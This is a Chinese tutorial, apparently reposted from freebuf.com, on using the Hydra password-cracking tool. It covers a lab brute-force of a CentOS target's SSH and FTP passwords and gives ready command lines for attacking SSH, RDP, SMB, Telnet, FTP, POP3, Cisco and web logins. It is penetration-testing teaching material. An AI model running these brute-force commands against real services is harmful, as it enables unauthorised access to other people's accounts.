*本工具仅供技术分享、交流讨论,严禁用于非法用途。
简介
hydra破解工具支持多种协议的登录密码,可以添加新组件,使用方便灵活。hydra可在Linux、Windows和OS X中使用。hydra可以用来破解很多种服务,包括IMAP,HTTP,SMB,VNC,MS-SQL,MySQL,SMTP等等
hydra的主要选项
-R 修复之前使用的aborted/crashed session
-S 执行SSL(Secure Socket Layer)连接
-s Port 使用非默认服务器端口而是其他端口时,指定其端口
-l Login 已经获取登录ID的情况下输入登录ID
-L FILE 未获取登录ID情况下指定用于暴力破解的文件(需要指出全路径)
-p Pass 已经获取登录密码的情况下输入登录密码
-P FILE 未获取登录密码的情况下指定用于暴力破解的文件(需要指出全路径)
-x MIN:MAX:CHARSET 暴力破解时不指定文件,而生可以满足指定字符集和最短、最长长度条件的密码来尝试暴力破解
-C FILE 用于指定由冒号区分形式的暴力破解专用文件,即ID:Password形式
-M FILE指定实施并列攻击的文件服务器的目录文件
-o FILE以STDOUT的形式输出结果值
-f 查找到第一个可以使用的ID和密码的时候停止破解
-t TASKS 指定并列连接数(默认值:16)
-w 指定每个线程的回应时间(Waittime)(默认值:32秒)
-4/6 指定IPv4/IPv6(默认值:IPv4)
-v/-V 显示详细信息
-U 查看服务器组件使用明细
测试环境:
爆破机:kali 2.0
靶机:centos 7 root密码设置为aab=8
新建一个名为www的ftp用户,密码为aab*2
在kali生成一个5位数的密码字典
Bash
测试爆破靶机ssh密码
Bash
参数解释:-l root 指定爆破账号为root
-w 10 指定每个线程的回应时间为10S
-P pwd.txt 指定密码字典为pwd.txt
-t 10 指定爆破线程为10个
-v 指定显示爆破过程
-f 查找到第一个可以使用的ID和密码的时候停止破解
通过上面的信息返回。可以看出爆破目标机器的ssh账号为root,密码为aab=8
![图片[1]-密码破解之hydra工具 – 作者:Zxl2605-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210517/1621253473_60a25d61f3a75cb9f67c8.png)
验证ssh登录
Bash
测试爆破靶机ftp密码
Bash
通过上面的信息返回。可以看出爆破目标机器的ftp账号为www,密码为aab*2
![图片[2]-密码破解之hydra工具 – 作者:Zxl2605-安全小百科](http://aqxbk.com/./wp-content/uploads/freebuf/image.3001.net/images/20210517/1621253435_60a25d3b4bb5ae35e04ec.png)
使用hydra其他的一些方式
破解ssh的密码
Bash
| 1 | # hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh |
|---|---|
破解https:
Bash
| 1 | # hydra -m /index.php -l username -P pass.txt IP https |
|---|---|
破解teamspeak:
Bash
| 1 | # hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak |
|---|---|
破解cisco:
Bash
| 1 | # hydra -P pass.txt IP cisco |
|---|---|
| 2 | # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable |
破解smb:
Bash
| 1 | # hydra -l administrator -P pass.txt IP smb |
|---|---|
破解pop3:
Bash
| 1 | # hydra -l muts -P pass.txt my.pop3.mail pop3 |
|---|---|
破解rdp:
Bash
| 1 | # hydra IP rdp -l administrator -P pass.txt -V |
|---|---|
破解http-proxy:
Bash
| 1 | # hydra -l admin -P pass.txt http-proxy://10.36.16.18 |
|---|---|
破解telnet
Bash
| 1 | # hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V |
|---|---|
破解ftp:
Bash
| 1 | # hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV |
|---|---|
| 2 | # hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV |
get方式提交,破解web登录:
Bash
| 1 | # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/ |
|---|---|
| 2 | # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php |
来源:freebuf.com 2021-05-17 20:05:55 by: Zxl2605
请登录后发表评论
注册